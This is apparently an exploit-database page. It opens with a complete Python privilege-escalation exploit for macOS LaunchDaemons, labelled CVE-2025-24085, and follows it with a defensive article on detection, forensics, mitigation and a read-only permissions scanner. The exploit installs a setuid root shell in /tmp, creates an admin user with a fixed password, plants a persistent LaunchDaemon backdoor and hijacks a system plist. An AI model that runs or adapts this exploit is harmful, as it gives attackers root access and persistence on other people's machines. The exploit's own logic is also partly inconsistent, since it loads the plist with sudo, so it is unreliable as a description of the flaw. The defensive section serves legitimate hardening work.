macOS LaunchDaemon iOS 17.2 - Privilege Escalation
#!/usr/bin/env python3
# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# Tested on: macOS Sonoma (14.x ARM64 / x86_64)
# CVE: CVE-2025-24085
# Type: Local Privilege Escalation
# Platform: macOS
# Author Country: Jordan
# Description:
# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute
# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary,
# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the
# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root
# on macOS Sonoma systems.
import os
import plistlib
import time
from pathlib import Path
LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"
def create_payload():
print("[+] Creating root payload script...")
payload = """#!/bin/bash
# Root shell
cp /bin/bash /tmp/.rootbash
chmod +s /tmp/.rootbash
chown root:wheel /tmp/.rootbash
# Add admin user
sysadminctl -addUser pentest -password macOS123! -admin
# Log file
echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog
# Persistent backdoor
cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.apple.backdoor</string>
<key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
<key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
"""
with open(PAYLOAD_SCRIPT, "w") as f:
f.write(payload)
os.chmod(PAYLOAD_SCRIPT, 0o755)
def hijack_launchdaemon():
print("[+] Hijacking LaunchDaemon plist...")
if not Path(LAUNCHD_PLIST).exists():
# create a fake one
print("[*] Creating fake LaunchDaemon plist for exploitation...")
plist_data = {
'Label': 'com.apple.securemonitor',
'ProgramArguments': [PAYLOAD_SCRIPT],
'RunAtLoad': True,
}
with open(LAUNCHD_PLIST, "wb") as f:
plistlib.dump(plist_data, f)
else:
# hijack existing one
with open(LAUNCHD_PLIST, 'rb') as f:
plist = plistlib.load(f)
plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
plist['RunAtLoad'] = True
with open(LAUNCHD_PLIST, 'wb') as f:
plistlib.dump(plist, f)
os.system(f"chmod 644 {LAUNCHD_PLIST}")
os.system(f"chown root:wheel {LAUNCHD_PLIST}")
def trigger_payload():
print("[+] Triggering LaunchDaemon manually...")
os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
print("[+] Done. You can now execute /tmp/.rootbash -p for root shell")
def main():
if os.geteuid() == 0:
print("[!] You are already root. No need to exploit.")
return
create_payload()
hijack_launchdaemon()
print("[+] Exploit completed. Reboot or run manually:")
print(f" sudo launchctl load -w {LAUNCHD_PLIST}")
print(" Then run: /tmp/.rootbash -p")
if __name__ == "__main__":
main()macOS LaunchDaemon Privilege Escalation (CVE-2025-24085) — Analysis, Detection, and Mitigation
Summary: CVE-2025-24085 describes a local privilege escalation affecting macOS Sonoma (14.x) where a misconfigured or improperly protected LaunchDaemon property list (plist) can be abused by a local, non-privileged user to cause launchd to run attacker-controlled code as root. This article explains the vulnerability at a high level, outlines impact and threat scenarios, and provides practical, defensive guidance for detection, mitigation, and secure hardening. The analysis is oriented toward system administrators, incident responders, and developers who must remediate or defend macOS endpoints.
Vulnerability overview
The vulnerable condition arises when a LaunchDaemon plist that is loaded by launchd is writable or otherwise modifiable by an unprivileged user, or when a trusted plist’s contents (such as its ProgramArguments) can be replaced without adequate integrity checks. Because LaunchDaemons run in the system context and are typically launched by launchd with root privileges, changing the plist to point at an attacker-controlled executable or script can result in arbitrary code execution as root.
Key characteristics:
- Local, not remote — attacker requires local access to the machine.
- Relies on insecure file permissions, ownership, or absent integrity verification of LaunchDaemon plists.
- High impact — successful exploitation yields root privileges and persistent access (via persistent LaunchDaemon entries or setuid binaries).
Root cause
Root causes typically include one or more of the following:
- Incorrect file permissions or ownership on files under /Library/LaunchDaemons (e.g., world-writable files or files owned by non-root users).
- Tools or installers that create or modify system plists without enforcing strict ownership and mode (root:wheel, 0644/0444 as appropriate).
- Insufficient runtime validation by management software that trusts external input when assembling plist content.
- Absence or bypassing of system protections (e.g., System Integrity Protection restrictions circumvented by prior misconfiguration or third-party software).
Threat model and impact
An attacker with an unprivileged local account can achieve full system compromise if they can write to or replace a LaunchDaemon loaded by launchd. The attacker can:
- Execute arbitrary code as root.
- Create stealthy persistence via new LaunchDaemons or setuid binaries.
- Add privileged user accounts or exfiltrate system secrets.
The exploitation path requires local access; it is not a remote code execution vulnerability by itself. However, combined with remote footholds (phishing, remote code execution in another component), it becomes significantly more dangerous.
Detection and forensics
Detection should focus on both pre-exploitation indicators (insecure file state) and post-exploitation indicators (unexpected services, setuid binaries, new admin accounts, suspicious logs).
- File system checks: Scan /Library/LaunchDaemons for files that are not owned by root:wheel or have lax permissions (e.g., world-writable). Also look for new or unfamiliar plist files.
- Binary integrity: Look for unexpected setuid binaries or copies of shells (e.g., new root-owned executables in /tmp, /usr/local/bin, or other writeable locations).
- User accounts: Monitor for newly created admin users or changes to group membership.
- launchd activity: Check launchd logs for load/unload events, failures, or services launched outside normal maintenance windows.
- Syslog and unified logging: Search the unified logging system for messages tied to suspicious plist loads or programs specified as ProgramArguments for system LaunchDaemons.
Forensic checklist
| Item | What to look for |
|---|---|
| LaunchDaemons | Non-root ownership, world-writable mode, unfamiliar plists, recently modified timestamps |
| Files & binaries | New setuid-root files, unexpected shell copies in writable directories |
| User accounts | New admin users, unexpected password changes or sudoers modifications |
| Logs | launchd load/unload events, auth logs showing privilege escalations, created files in /tmp |
Mitigation and remediation
Remediation and mitigation should be prioritized as follows: patch affected systems, restore correct permissions and ownerships, remove unauthorized artifacts, and harden system configuration.
- Apply vendor patch: Install the official macOS security update that addresses CVE-2025-24085 from Apple as soon as possible.
- Correct ownership and permissions: Ensure every file under /Library/LaunchDaemons is owned by root:wheel and has restrictive permissions (typically 0644 for plist files). Files should not be writable by unprivileged users.
- Remove unauthorized artifacts: Remove unknown LaunchDaemons and binaries introduced by untrusted accounts; if compromise is suspected, consider full system reinstallation.
- Use integrity monitoring: Employ file integrity monitoring (FIM) to alert on changes to system directories and files.
- Harden endpoint policies: Enforce least privilege, restrict local admin privileges, and use MDM solutions to only allow signed, vetted installers to modify system files.
- Audit and limit third-party installers: Validate installers and scripts that create or modify plists to enforce correct ownership and permissions at install time.
Safe examples for defenders
The following read-only Python script is a defensive scanner that enumerates LaunchDaemons and reports files that are not owned by root or have permissive modes. It does not modify system state; use it as part of triage and monitoring.
#!/usr/bin/env python3
# Defensive: scan /Library/LaunchDaemons for ownership/mode issues (read-only)
import os
import stat
from pathlib import Path
def report_issue(path, owner_ok, mode_ok):
print(f"{path}: owner_ok={owner_ok}, mode_ok={mode_ok}")
def main():
base = Path("/Library/LaunchDaemons")
if not base.exists():
print("No LaunchDaemons directory found.")
return
for p in base.iterdir():
try:
st = p.stat()
owner_ok = (st.st_uid == 0 and st.st_gid == 0) # root:wheel expected
mode_ok = not (st.st_mode & stat.S_IWOTH or st.st_mode & stat.S_IWGRP)
if not (owner_ok and mode_ok):
report_issue(str(p), owner_ok, mode_ok)
except Exception as e:
print(f"Error checking {p}: {e}")
if __name__ == '__main__':
main()
Explanation: This script inspects each file in /Library/LaunchDaemons and reports files that deviate from the expected ownership (UID/GID 0) or that are writable by group/others. It is intended as a first-step detection tool for system administrators and should be run with appropriate auditing and change-control processes in place.
Recommended quick checks (defensive)
- Confirm System Integrity Protection (SIP) is enabled for standard macOS configurations.
- Review MDM profiles and installer logs for recent modifications to system plists.
- Use a file integrity tool (Tripwire, osquery, FIM agents) to baseline and alert on changes.
Note on remediation operations: Commands that change ownership or permissions may be necessary to restore a safe state, but they must be used carefully and ideally from a trusted admin session or recovery environment. If a compromise is suspected, preserve forensic images and consult incident response procedures before remediation that might destroy evidence.
Secure development and deployment practices
To prevent similar issues in the future, software vendors and system maintainers should adopt the following practices:
- Ensure installers set correct ownership and permissions for system files and verify after installation.
- Sign and notarize system components and perform integrity checks where feasible.
- Avoid designs that require privileged services to accept untrusted input when constructing program arguments or executable paths.
- Use least-privilege deployment models and avoid granting local accounts unnecessary write access to system directories.
- Integrate static analysis and configuration compliance checks in CI/CD pipelines for macOS packaging.
Conclusion
CVE-2025-24085 demonstrates the severe impact that file-permission and configuration weaknesses can have on modern endpoint security. The vulnerability is mitigated primarily by timely patching, correct file ownership and mode enforcement, and proactive monitoring of system configuration changes. Organizations should combine technical remediation with process controls — patch management, least privilege, and integrity monitoring — to reduce the likelihood of similar local privilege escalation vectors.
Reference: CVE-2025-24085 (publicly disclosed report of a LaunchDaemon plist privilege escalation). If you manage macOS fleet devices, prioritize vendor-supplied updates and validate your endpoint configuration baselines.